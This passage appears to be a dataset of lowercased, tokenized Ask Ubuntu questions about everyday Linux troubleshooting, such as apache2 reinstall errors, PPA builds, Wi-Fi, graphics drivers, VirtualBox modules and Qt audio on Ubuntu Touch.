442878	error installing apache2 in ubuntu 12.04	i 'm new to ubuntu , i 'd installed apache2 in ubuntu but due to errors during installation i uninstalled it . but when i try re-installing it again an error is displayed in terminal.. error : module cgid does not exixts . it looks like you 've deleted /etc/apache2/mods-available/cgid.load , so mod_cgid can not be enabled . to fix this , please purge and reinstall apache2.2-commom . /etc/init.d/apache2 : 51 : . : ca n't open /etc/apache2/envvars invoke-rc.d : initscript apache2 , action `` start '' failed.. please help me to solve this error..
442881	read/write excel files using java in linux environment ( query based )	requirement : - i 'm looking for help in finding some workaround so that we can : use an excel driver ( preferably some kind of odbc-jdbc bridge ) use sql queries with the driver . perform sql queries in java using a linux environment error : - /usr/lib/jvm/java-7-oracle/bin/java : symbol lookup error : /usr/lib/jvm/java-7-oracle/jre/lib/amd64/libjdbcodbc.so : undefined symbol : sqlallocenv
442885	desktop vs server on a physical server	do the physical servers support high graphical interfaces ? i ask this question in order to see if installing a linux desktop instead of a linux server on a physical server wo n't lead me to low graphical performances .
442886	why is n't launchpad building my package ?	i attempted to upload files to launchpad for building , using dput ppa : sparhawkthesecond/ahm xserver-xorg-input-evdev_2.8.2-1ubuntu2ahm0ly1_source.changes it completed fine , and i was told that it was in the queue . i 've been checking my ppa page , but it 's still coming up empty , about 8 hours later . from the builders ' page , under `` ppa build status '' , it seems like wait time should be well under that . currently , it says amd64 44 46 jobs ( 10 minutes ) has my package failed ? and how can i check to see what the status of my package is ? fwiw , i tried uploading again , and it confirmed that this was fine . $ dput ppa : sparhawkthesecond/ahm xserver-xorg-input-evdev_2.8.2-1ubuntu2ahm0ly1_source.changes package has already been uploaded to ppa on ppa.launchpad.net nothing more to do for xserver-xorg-input-evdev_2.8.2-1ubuntu2ahm0ly1_source.changes i 'm not sure if this is related , but i also attempted to import my openpgp key , but never got an email .
442887	changing the colors of lxterminal	how can i change the default colors of the lxterminal in lubuntu using .bashrc ?
442894	wifi is connected but internet ca n't be accessed	i have a hp 110-mini laptop dual booting ubuntu 13.10 and windows 7 . i am trying to build lfs . but recently , my internet access just went off . it says i am connected to the wifi and i can access the internet with other devices , i can also access internet on the same laptop when i am booted into windows 7 . only when am on ubuntu every browser says server ca n't be found . can you please help me ?
442895	install 64 bit mysql	i had installed mysql by using below command . sudo apt-get install mysql-server but this a 32-bit mysql installation . i want to install 64-bit mysql . please advice me how to delete 32bit mysql and install 64-bit mysql
442896	sorting the output of my directory	how can i create a new file called option1.txt on my desktop . this file should contain the contents of my 'home ' directory . and how would i make my output is : sorted alphabetically by entry extension . includes any hidden files and folders . shows all of the file sizes in human readable format
442897	ubuntu 12.04 64 bit : double click does not open applications	i have just reinstalled my ubuntu 12.04 64 bit . the problem is that if i click an icon on unity , chromium for instance , the application does not open . in addition , also a double click on a file does not open it . this is true for all the programs that i have added to the original list of programs . for instance , if i try to open firefox by clicking on unity 's icon it works . in any case all the applications work normally if i run them from the terminal . thank you for your help .
442901	what is the memory limit on ubuntu ?	i 'm a inexperienced user on linux and was wondering if it had any limit . windows has limit 32bit-4gb , 64bit-128gb or so . any help appreciated . does the 32bit version of ubuntu have a limit ?
442907	what causes ubuntu 12.04 to fail to mount drives when powered on ?	when i start up my computer , ubuntu loads and then freezes up and creates this huge description on the screen saying its creating something , and says i need a reboot . so i restart the computer and it does it again . please help ! thanks .
442910	how to open my webpage using external ip in my pc ?	i am using ubuntuserver13.10 in my server and windows7sp1 in my pc and both connected with a dsl modem ( dynamic external ip ) , so whenever i try to open my server page in my pc using internal ip of server like ( 192.168.1.99 ) , i got my server webpage in browser but whenever i try to open using external ip in my pc , that is forwarded to server internal ip , i am not getting my server webpage in my pc browser . but when i use any proxy/vpn then i am able to open my server webpage in pc using external ip . now my question is how to open external ip in my own pc without proxy/vpn ? so do you have any solution for this .
442914	calculating the number of lines in a file ?	how would i calculate and display the number of lines and words that are contained in a .sh file
442918	why would n't sound be heard on the phone when it works on the desktop with an ubuntu touch app ?	i have an ubuntu touch application in the works . the application needs to playback sound . i 've used qtmultimedia from c++ for sound playback . the sound plays fine on pc but not on the phone . the odd thing is that when running the application on the phone using qtcreator and build → ubuntu → run application on device , the sound plays back just fine . when installing the application on the phone and using build → ubuntu → install application on device , and then running it from the phone 's dash the sound is not heard . my development environment is ubuntu 14.04 and the phone runs ubuntu touch ( trusty ) v250 . for reference here is the code snippet that i used for the actual playback : playlist : :playlist ( qobject *parent ) : qobject ( parent ) , m_tracklisthandler ( new tracklisthandler ( ) ) , m_playlist ( new qmediaplaylist ( ) ) , m_player ( new qmediaplayer ( ) ) , m_currentindex ( 0 ) { m_player- > setplaylist ( m_playlist ) ; } void playlist : :playtrack ( int index ) { if ( index < m_tracklist.count ( ) ) { m_playlist- > setcurrentindex ( index ) ; m_currentindex = index ; m_player- > play ( ) ; emit playbackstarted ( m_tracklist.at ( index ) ) ; } } void playlist : :resumeplayback ( ) { // ... } void playlist : :pause ( ) { // ... } void playlist : :nexttrack ( ) { // ... } void playlist : :previoustrack ( ) { // ... } void playlist : :appendtrack ( ptrack track ) { // ... } void playlist : :appendandplay ( ptrack track ) { // ... } the full source code for playlist.h : # include `` playlist.h '' # include `` album.h '' # include `` track.h '' # include `` tracklisthandler.h '' # include < qmediaplaylist > # include < qmediaplayer > # include `` logger.h '' playlist & playlist : :instance ( ) { static playlist instance ; return instance ; } playlist : :playlist ( qobject *parent ) : qobject ( parent ) , m_tracklisthandler ( new tracklisthandler ( ) ) , m_playlist ( new qmediaplaylist ( ) ) , m_player ( new qmediaplayer ( ) ) , m_currentindex ( 0 ) { log_info < < `` called '' ; m_player- > setplaylist ( m_playlist ) ; } playlist : :~playlist ( ) { delete m_tracklisthandler ; delete m_playlist ; delete m_player ; } void playlist : :playtrack ( int index ) { log_info < < `` called '' ; if ( index < m_tracklist.count ( ) ) { m_playlist- > setcurrentindex ( index ) ; m_currentindex = index ; m_player- > play ( ) ; emit playbackstarted ( m_tracklist.at ( index ) ) ; } } void playlist : :resumeplayback ( ) { log_info < < `` called '' ; m_player- > play ( ) ; emit playbackstarted ( m_tracklist.at ( m_currentindex ) ) ; } void playlist : :pause ( ) { log_info < < `` called '' ; m_player- > pause ( ) ; } void playlist : :nexttrack ( ) { log_info < < `` called '' ; int nextindex = m_currentindex + 1 ; if ( nextindex > = m_tracklist.count ( ) ) { nextindex = 0 ; } m_currentindex = nextindex ; m_playlist- > setcurrentindex ( m_currentindex ) ; m_player- > play ( ) ; emit playbackstarted ( m_tracklist.at ( m_currentindex ) ) ; } void playlist : :previoustrack ( ) { log_info < < `` called '' ; int previousindex = m_currentindex - 1 ; if ( previousindex < = 0 ) { previousindex = m_tracklist.count ( ) - 1 ; } m_currentindex = previousindex ; m_playlist- > setcurrentindex ( m_currentindex ) ; m_player- > play ( ) ; emit playbackstarted ( m_tracklist.at ( m_currentindex ) ) ; } void playlist : :appendtrack ( ptrack track ) { log_info < < `` called '' ; m_tracklist.append ( track ) ; m_playlist- > addmedia ( m_tracklisthandler- > streamurl ( track ) ) ; emit playlistchanged ( ) ; } void playlist : :appendandplay ( ptrack track ) { log_info < < `` called '' ; m_tracklist.append ( track ) ; m_playlist- > addmedia ( m_tracklisthandler- > streamurl ( track ) ) ; m_currentindex = m_tracklist.indexof ( track ) ; m_playlist- > setcurrentindex ( m_currentindex ) ; m_player- > play ( ) ; emit playlistchanged ( ) ; emit playbackstarted ( track ) ; } tracklist playlist : :tracks ( ) const { return m_tracklist ; } void playlist : :clear ( ) { m_tracklist.clear ( ) ; m_playlist- > clear ( ) ; } int playlist : :count ( ) const { return m_tracklist.count ( ) ; } the playlist.cpp file : # ifndef playlist_h # define playlist_h # include < qobject > # include `` common.h '' class tracklisthandler ; class qmediaplaylist ; class qmediaplayer ; class playlist : public qobject { q_object public : static playlist & instance ( ) ; public : void playtrack ( int index ) ; void resumeplayback ( ) ; void pause ( ) ; void nexttrack ( ) ; void previoustrack ( ) ; void appendandplay ( ptrack track ) ; void appendtrack ( ptrack track ) ; tracklist tracks ( ) const ; void clear ( ) ; int count ( ) const ; signals : void playlistchanged ( ) ; void playbackstarted ( ptrack track ) ; private : tracklist m_tracklist ; tracklisthandler *m_tracklisthandler ; qmediaplaylist *m_playlist ; qmediaplayer *m_player ; int m_currentindex ; private : playlist ( qobject *parent = 0 ) ; virtual ~playlist ( ) ; playlist ( playlist const & ) : qobject ( 0 ) { } playlist & operator = ( playlist const & ) { return *this ; } } ; # endif // playlist_h the application log : playlist.cpp 111 void playlist : :appendandplay ( ptrack ) info : called shm_open ( ) failed : permission denied failed to create secure directory ( /run/user/32011/pulse ) : permission denied can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started gstreamer ; unable to pause - `` http : //192.168.0.110:4040/rest/stream.view ? & v=1.10.2 & c=ro.kicsyromy.playsonic & id=396 '' shm_open ( ) failed : permission denied failed to create secure directory ( /run/user/32011/pulse ) : permission denied can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started gstreamer ; unable to play - `` http : //192.168.0.110:4040/rest/stream.view ? & v=1.10.2 & c=ro.kicsyromy.playsonic & id=396 '' playlistmodel.cpp 33 virtual qvariant playlistmodel : :data ( const qmodelindex & , int ) const info : called for index 0 playlistmodel.cpp 33 virtual qvariant playlistmodel : :data ( const qmodelindex & , int ) const info : called for index 0 playlistmodel.cpp 33 virtual qvariant playlistmodel : :data ( const qmodelindex & , int ) const info : called for index 0 error : `` could not initialize supporting library . '' the manifest.json file : { `` architecture '' : `` all '' , `` description '' : `` player client for subsonic and subsonic api compatible servers '' , `` framework '' : `` ubuntu-sdk-13.10 '' , `` hooks '' : { `` playsonic '' : { `` apparmor '' : `` playsonic.json '' , `` desktop '' : `` playsonic.desktop '' } } , `` maintainer '' : `` romeo calota '' , `` name '' : `` ro.kicsyromy.playsonic '' , `` title '' : `` playsonic '' , `` version '' : `` 0.1 '' } the apparmor profile : { `` policy_groups '' : [ `` networking '' , `` audio '' , `` accounts '' , `` audio '' , `` calendar '' , `` camera '' , `` connectivity '' , `` contacts '' , `` content_exchange '' , `` content_exchange_source '' , `` friends '' , `` history '' , `` location '' , `` microphone '' , `` music_files '' , `` music_files_read '' , `` networking '' , `` picture_files '' , `` picture_files_read '' , `` sensors '' , `` usermetrics '' , `` video '' , `` video_files '' , `` video_files_read '' ] , `` policy_version '' : 1 }
442921	booting ubuntu 12.04 on master hdd with windows 7 on slave	hi folks i recently made the switch over completely to ubuntu 12.04 since this version has the long term support , i would like to stress first of all i am tech savvy however i am a complete noob with ubuntu . my problem is i have windows 7 on a hdd from my old computer and ubuntu 12.04 running on a 1.5tb hdd both use the sata connection interface just incase anyone asks lol . now when i try to select windows seven from the splash screen that appears asking do i want to boot ubuntu or ubuntu with recovery mode etc , i select windows 7 which is on sdb1 according to the info displayed . it then tells me there was a efi error now i have no idea what that is . when i load into ubuntu i have no problems accessing the files from the windows 7 hdd . so in a nut shell what am i doing wrong what am i missing ? : ( if you need system specs to help solve my problem i can provide that if needed i just need a good system profiling tool compatible with ubuntu .
442924	filter 's inputs in avconv	i 'm going to crop some desktop regions and overlay them on the scene . avconv -f x11grab -s : v 100x100 -r 30 -i :0.0+10:10 -f x11grab -s : v 100x100 -r 30 -i :0.0+200:200 -f alsa -ac 2 -i pulse -c : a libvo_aacenc -b : a 96k -ar 44100 -ac 2 -vf `` color=black @ 0.8:1366x768:30 , setpts=pts-startpts [ black ] ; movie=/dev/video0 : f=video4linux2 , vflip , scale=240 : -1 , setpts=pts-startpts [ cam ] ; [ black ] [ in ] overlay=0:0 [ black+in ] ; [ black+in ] [ cam ] overlay=1000:10 [ out ] '' -c : v libx264 -preset veryfast -crf 22 -b : v 512k -bufsize 3000k -threads 0 -f avi -y scrvideo.avi but it does n't work and i do n't know how to separate `` input # 0 '' and `` input # 1 '' in filter . docs are very strange and everywhere only `` [ in ] - > [ out ] '' scheme has been used . the result is black scene with camera . i tried to sprit the whole desktop ( 1366x768 ) on 2 pads inside the filter and crop regions there but it doesnt work too . avconv version 0.8.10-4:0.8.10-0ubuntu0.12.04.1 , copyright ( c ) 2000-2013 the libav developers built on feb 6 2014 20:59:08 with gcc 4.6.3 [ x11grab @ 0x9ce43c0 ] device : :0.0+10:10 - > display : :0.0 x : 10 y : 0 width : 100 height : 100 [ x11grab @ 0x9ce43c0 ] shared memory extension found [ x11grab @ 0x9ce43c0 ] estimating duration from bitrate , this may be inaccurate input # 0 , x11grab , from ':0.0+10:10 ' : duration : n/a , start : 1396538114.117124 , bitrate : 9600 kb/s stream # 0.0 : video : rawvideo , bgra , 100x100 , 9600 kb/s , 30 tbr , 1000k tbn , 30 tbc [ x11grab @ 0x9cf3860 ] device : :0.0+200:200 - > display : :0.0 x : 200 y : 0 width : 100 height : 100 [ x11grab @ 0x9cf3860 ] shared memory extension found [ x11grab @ 0x9cf3860 ] estimating duration from bitrate , this may be inaccurate input # 1 , x11grab , from ':0.0+200:200 ' : duration : n/a , start : 1396538114.154109 , bitrate : 9600 kb/s stream # 1.0 : video : rawvideo , bgra , 100x100 , 9600 kb/s , 30 tbr , 1000k tbn , 30 tbc [ alsa @ 0x9d0ce40 ] capture with some alsa plugins , especially dsnoop , may hang . [ alsa @ 0x9d0ce40 ] estimating duration from bitrate , this may be inaccurate input # 2 , alsa , from 'pulse ' : duration : n/a , start : 1396538113.995116 , bitrate : n/a stream # 2.0 : audio : pcm_s16le , 48000 hz , 2 channels , s16 , 1536 kb/s incompatible pixel format 'bgra ' for codec 'libx264 ' , auto-selecting format 'yuv420p' [ buffer @ 0x9d2ca00 ] w:100 h:100 pixfmt : bgra [ video4linux2 @ 0x9d21660 ] estimating duration from bitrate , this may be inaccurate [ movie @ 0x9d21320 ] seek_point:0 format_name : video4linux2 file_name : /dev/video0 stream_index:0 [ overlay @ 0x9d2dae0 ] auto-inserting filter 'auto-inserted scaler 0 ' between the filter 'src ' and the filter 'parsed filter 6 overlay' [ color @ 0x9d0fd00 ] w:1366 h:768 r:30/1 color:0x108080cc [ yuva ] [ color @ 0x9d0fd00 ] tb:0.033333 [ scale @ 0x9d2ec60 ] w:100 h:100 fmt : bgra - > w:100 h:100 fmt : yuva420p flags:0x4 [ overlay @ 0x9d2dae0 ] main w:1366 h:768 fmt : yuv420p overlay x:0 y:0 w:100 h:100 fmt : yuva420p [ overlay @ 0x9d2dae0 ] main_tb:1/30 overlay_tb:1/1000000 - > tb:1/3000000 exact:1 [ scale @ 0x9d22260 ] w:640 h:480 fmt : yuyv422 - > w:240 h:180 fmt : yuva420p flags:0x4 [ scale @ 0x9d22260 ] tb:0.000001 [ overlay @ 0x9d21200 ] main w:1366 h:768 fmt : yuv420p overlay x:1000 y:10 w:240 h:180 fmt : yuva420p [ overlay @ 0x9d21200 ] main_tb:1/3000000 overlay_tb:1/1000000 - > tb:1/3000000 exact:1 [ libx264 @ 0x9d0ee20 ] vbv bufsize set but maxrate unspecified , ignored [ libx264 @ 0x9d0ee20 ] using sar=1/1 [ libx264 @ 0x9d0ee20 ] using cpu capabilities : mmx2 sse2fast ssse3 fastshuffle cache64 [ libx264 @ 0x9d0ee20 ] profile main , level 3.2 output # 0 , avi , to 'scrvideo.avi ' : metadata : isft : lavf53.21.1 stream # 0.0 : video : libx264 , yuv420p , 1366x768 [ par 1:1 dar 683:384 ] , q=-1 -- 1 , 512 kb/s , 30 tbn , 30 tbc stream # 0.1 : audio : libvo_aacenc , 44100 hz , 2 channels , s16 , 96 kb/s stream mapping : stream # 0:0 - > # 0:0 ( rawvideo - > libx264 ) stream # 2:0 - > # 0:1 ( pcm_s16le - > libvo_aacenc ) press ctrl-c to stop encoding frame= 219 fps= 31 q=-1.0 lsize= 179kb time=6.34 bitrate= 231.3kbits/s
442926	compiling and running java code - noclassdeffounderror	i tried to compile some code written in java and i used the command : javac code.java java code.java and i got following errors : exception in thread `` main '' java.lang.noclassdeffounderror : code/java caused by : java.lang.classnotfoundexception : code.java at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:323 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:268 ) could not find the main class : code.java . program will exit . i would be thankful for your advice .
442928	can not mount /sys/fs/cgroup 13.10 vagrant box	i have a very weird problem with my ubuntu box , it shows the errors : an error occurred while mounting /sys/fs/cgroup . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /sys . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /sys/fs/fuse/connections . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /sys/kernel/debug . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /sys/kernel/security . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /run/lock . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /run/shm . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /run/user . keys : press s to skip mounting or m for manual recovery . an error occurred while mounting /sys/fs/pstore . keys : press s to skip mounting or m for manual recovery . i have tried to reinstall the box and it happens all the time after i use docker to do some work . but it fails occasionally .
442930	which proprietary driver should i activate ?	i just recently built my own computer , and i am now trying to run ubuntu 12.04 lts on it from a flash drive with `` casper-rw persistence '' . i 'm very new to the ubuntu operating system , so i was exploring the settings when i noticed something after using mesa-utils to get my graphics driver recognized . ubuntu thought i was using something called `` gallium 0.4 on amd cape verde '' , which is inaccurate as i 'm using a gigabyte radeon hd 7770 ghz edition 1gb video card . so , i went to the additional drivers section to download a proper update ( as i saw that updating driver 's manually was n't recommended by most on this site ) ... and found 3 . `` video driver for the amd graphics accelerators '' was listed three times on the list , and with the exact same description on each . i do n't know which one to pick , and i would just pick randomly but the last time i did that on this computer it ... started having a lot of problems , including not showing any graphics , not allowing me to click `` try ubuntu '' when i start the computer , and even not loading at all as things got worse . is there a way to tell the difference between these three updates ? should i install something manually ? and from where ?
442934	unable to install latest ubuntu 12.04.4/13.10-hangs after installation-upon reboot system running low graphics error	when i download any latest ubuntu i.e 12.04.4 or 13.10 after installation is complete the system hangs when i click the 'restart now ' button . then when i hard reboot it it says `` system running in low graphics mode '' . i installed the older version of ubuntu 12.04 that i have burned on a cd , i do n't have this problem . the system reboots properly and is working fine even after updates . i checked for about a week and it did not face any errors or issues . i have checked how to fix `` the system is running in low-graphics mode '' error ? question already . but i could not figure out which solution would fix my problem . my mother board is a asus a8v-mx and i am running integrated graphics card on the motherboard . the problem has risen clearly after some update that canonical have carried out . i am not sure which area though . some one please help me to figure it out . thanks .
442936	second monitor for dell latitude 7440 ( ubuntu 13.10 )	i just got a brand new dell latitude e7440 . after installing ubuntu 13.10 ( as the only os ) , i 'm having some serious issues however : i have a docking station , through which i would like to connect the laptop a to second ( extended ) monitor . ubuntu does recognize the second screen , but it is completely black . also , choosing the 'mirror display ' option does n't yield any improvement . my laptop specs are the following : 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 0b ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 0b ) 00:03.0 audio device : intel corporation device 0a0c ( rev 0b ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i218-lm ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) 03:00.0 sd host controller : o2 micro , inc. device 8520 ( rev 01 ) ** would anyone have a suggestion on how to get my second monitor working ? thanks in advance !
442937	security antivirus	brand new to ubuntu ... i know there is way less virus problems then windows , however , is the security within the os enough or do you suggest antivirus program also ( this is assuming the individual is careful what is opened or not )
442941	how can i see a folder and a subfolder in the same window ?	how can i navigate folders and subfolders at the same time ? like `` column view '' in mac os x. edit 2 : i use ubuntu 14.04 and i could n't install marlin , so i installed `` pantheon file manager '' instead .
442942	skype wo n't start in ubuntu 13.10	i installed kubuntu desktop next to ubuntu 13.10 ( still new at these things ) . in the process i lost skype and ca n't find a way to recover it . it wo n't run in either desktop . i have already tried this solution with no success . if i start from the command line , i get this error . user @ ideapad : ~ $ skype error : ld.so : object '/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . /usr/bin/skype : 3 : exec : skype-bin : permission denied any help will be greatly appreciated .
442950	why is the default boot partition so small with whole disk encryption option ?	the boot partition , set up automatically by the ubuntu installer , is only ~230mb . this is the case on two different clean installs i have performed on different machines . both used the full disk encryption option . one is desktop ubuntu , the other used the server iso . i tell the installer to partition automatically , using the whole ( only ) disk . 230mb can only fit about five kernels , so after a few automatic updates /boot warnings begin to appear . the only solution is to clean them out manually ( not well documented ) . is there a reason the boot partition is so small ? why are there no mechanisms to clean out old kernels automatically ? is this a bug i should report ?
442951	virtual box not running - '/etc/init.d/vboxdrv setup ' issue	before asking i have checked virtualbox kernel driver not installed and virtualbox '/etc/init.d/vboxdrv setup ' issue , i have exactly same issue and have reinstalled vb also , output of running sudo dpkg-reconfigure virtualbox-dkms is shown below : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 4.1.12 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new virtualbox-4.1.12 dkms files ... building only for 3.5.0-47-generic building initial module for 3.5.0-47-generic error ! bad return status for module build on kernel : 3.5.0-47-generic ( i686 ) consult /var/lib/dkms/virtualbox/4.1.12/build/make.log for more information . make.log dkms make.log for virtualbox-4.1.12 for kernel 3.5.0-47-generic ( i686 ) thu apr 3 21:37:08 ist 2014 make : entering directory /usr/src/linux-headers-3.5.0-47-generic ' ld /var/lib/dkms/virtualbox/4.1.12/build/built-in.o ld /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/built-in.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/linux/supdrv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/supdrv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/supdrvsem.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/alloc-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/initterm-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/memobj-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/mpnotification-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/powernotification-r0drv.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/assert-r0drv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/alloc-r0drv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/initterm-r0drv-linux.o cc [ m ] /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.o /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.c : in function ‘rtr0memobjlinuxdommap’ : /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.c:1150:9 : error : implicit declaration of function ‘do_mmap’ [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv/r0drv/linux/memobj-r0drv-linux.o ] error 1 make [ 1 ] : *** [ /var/lib/dkms/virtualbox/4.1.12/build/vboxdrv ] error 2 make : *** [ _module_/var/lib/dkms/virtualbox/4.1.12/build ] error 2 make : leaving directory /usr/src/linux-headers-3.5.0-47-generic' if someone has faced same situation ... please help me out ! !
442954	why my touchpad not working ?	my laptop is an asus k53sc . it has an elantech touchpad . it becomes unresponsive after password screen at each reboot . what should i do ?
442955	prevent wifi from disabling at suspend ?	i have setup my ubuntu laptop as my xbmc centre , however i am wanting to store it under the tv to keep it tidy , this in turn will make it a faf to get to the laptops power button . i have already setup my laptop to be able to wake on both u and g , however for whatever reason it is n't working properly . is there any way to prevent the network card from shutting down when i suspend my laptop ? if i can manage this then i should be able to wake it with my yatse remote app . any help would be greatly appreciated . thanks , rob
442956	ttrying ubuntu 12.04 64 bit from a usb stick	i 've only been using ubuntu for a couple of weeks ( ex windows ( pun intended ) ) and i 've broken and reinstalled it 5 times . it 's a new asrock board with amd a4-5300 apu with radeon ( tm ) hd graphics ă 2 . every time i install the graphics driver ubuntu brakes ( black screen with a momentary `` signal out of range '' message or black and white strips ) and i find myself in recovery mode and very quickly learning how to use the console . i 've removed fglrx twice and got it running again but other times i just reloaded and started from scratch ... i 've read just about every post here on installing this driver and tried some and came to the conclusion that there is no driver for this thing , stuck with 1024 x 768 . i cant continue playing with the setup , i 've got to reload programs and do some work . so , then i thought maybe it 's a 64 bit driver and i 'm trying to install it in a 32 bit version of ubuntu ... any thoughts on that ? i have noticed quite a few with the same or similar problems and not to many [ solved ] ... but now my question , if i try and install the driver whilst running from a usb stick using the 64 bit version in trial mode , will there be any chance of 1 , breaking the hd installation and 2 , any chance of it working ... or alternatively , can i throw a video card in and ignore the on-board goodies ? i 'm not a gamer ... your thoughts ?
442957	how can i move connectivity to an external network using a second ethernet port on the maas server ?	how can i move connectivity to an external network using a second ethernet port on the maas server thus maintaining the maas network as a private one ? http communication would be on the public network .
442959	keyboard layout changed ( 13.10/ asus q301l )	i have ubuntu 13.10 64-bit installed on my asus vivobook q301l . i plugged in a usb keyboard , and now my layout seems to have changed , and i ca n't change it back . i noticed that my usb keyboard has ctrl , super , alt-keys starting from the left edge to the space bar . my laptop has ctrl , fn , super , alt . the issue is that some of my keys are typing wrong characters : 0 key types / p key types * ; key types - / key types + if i want the actual characters , i have to hold the fn-key on my laptop ( e.g . `` laptop would be `` la*to* '' if i did n't hold the fn key ) . i have run dpkg-reconfigure keyboard-configuration and selected asus laptop for my keyboard . still no luck .
442960	how to automate comparison of md5sum hash values for a large number of files	i can check md5sum hash of a file from a terminal as , $ md5sum my_sensitive_file 8dad53cfc973c59864b8318263737462 my_sensitive_file but the difficult part is to compare the hash value with exact one . it is difficult to compare the 32 characters output with original/exact hash value by any human for a large numbers of files . first of all the job would be very monotonous and there are big scope of errors . is it possible to automate the comparing process , preferably in cli ?
442963	tl-wn821n wifi not working correctly	i have a tl-wn821n wifi usb device which worked fine ( gave me a connection ) when i was installing ubuntu on my pc . it downloaded all the updates and what not and got the os installed . i even opened terminal after installation to see if i have a working connection by using ping command . and i did . now when i open up firefox and go to a webpage , it will load the webpage and after that the connection is gone , it still show like i am connected to the internet in the wifi status indicator but no futher pages can be opened and the ping command does not work anymore too . what might be the case here ? i want to say that i have now used to help from the web . used ndisgtk and added some files to /etc/modprobe my ubuntu installation now does not even see that i have this usb device connected to my computer . i reverted all changes and it still will not even see the device . i used lusb or whatever the command was ans lshw also to see it . nothing showed up . so what can i do now at this point ? how can i make my computer atleast detect the device . info with the wifi script : # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy # # # # # kernel # # # # # linux kaspar-all-series 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 0c ) subsystem : asustek computer inc. device [ 1043:8554 ] kernel driver in use : r8169 # # # # # lsusb # # # # # bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 004 : id 0bda:8178 realtek semiconductor corp. rtl8192cu 802.11n wlan adapter bus 003 device 003 : id 1532:000d razer usa , ltd bus 003 device 002 : id 046d : c326 logitech , inc . bus 003 device 005 : id 0781:5406 sandisk corp. cruzer micro u3 bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 6 , 20 ) ( 2457 - 2482 @ 40 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 6 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 80 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 80 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 57240 - 63720 @ 2160 ) , ( n/a , 0 ) # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # 